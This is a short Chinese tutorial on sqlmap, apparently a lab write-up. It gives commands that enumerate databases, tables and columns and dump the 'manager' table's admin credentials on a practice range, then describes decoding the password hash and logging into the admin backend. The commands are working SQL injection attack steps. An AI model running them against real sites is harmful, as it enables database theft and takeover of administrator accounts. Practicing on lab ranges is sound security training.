sqlmap的使用
Ps:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。
本次使用的命令
sqlmap.py -u {
URL} //查看是否有注入点
sqlmap.py -u {
URL} -dbs //爆数据库
sqlmap.py -u {
URL} -D db --tables //爆数据表
sqlmap.py -u {
URL} -D db -T table --columns //爆字段
sqlmap.py -u {
URL} -D db -T table -C column(s) --dump //输出字段
实际操作
本次使用江西软件大学网络攻防靶场做练习
开启环境寻找注入点
在浏览学校文章处找到了注入点,尝试开始使用sqlmap爆破
找到了注入点,开始爆数据库!
payload:
sqlmap.py -u http://117.167.XXX.XXX:28031/index/narticle.php?nid=3024 -dbs
选择rjxy数据库,开始爆表名!
payload:
sqlmap.py -u http://117.167.XXX.XXX:28031/index/narticle.php?nid=3024 -D rjxy --tables
选择manager表爆字段
payload:
sqlmap.py -u http://117.167.136.244:28031/index/narticle.php?nid=3024 -D rjxy -T manager --columns
查询管理员密码
payload:
sqlmap.py -u http://117.167.136.244:28031/index/narticle.php?nid=3024 -D rjxy -T manager -C username,password --dump
此时得到管理员admin账户的密码,Base64解密后进行MD5解密,得到密码
访问robots.txt查询管理员后台
进入管理员后台界面
成功进入后台界面!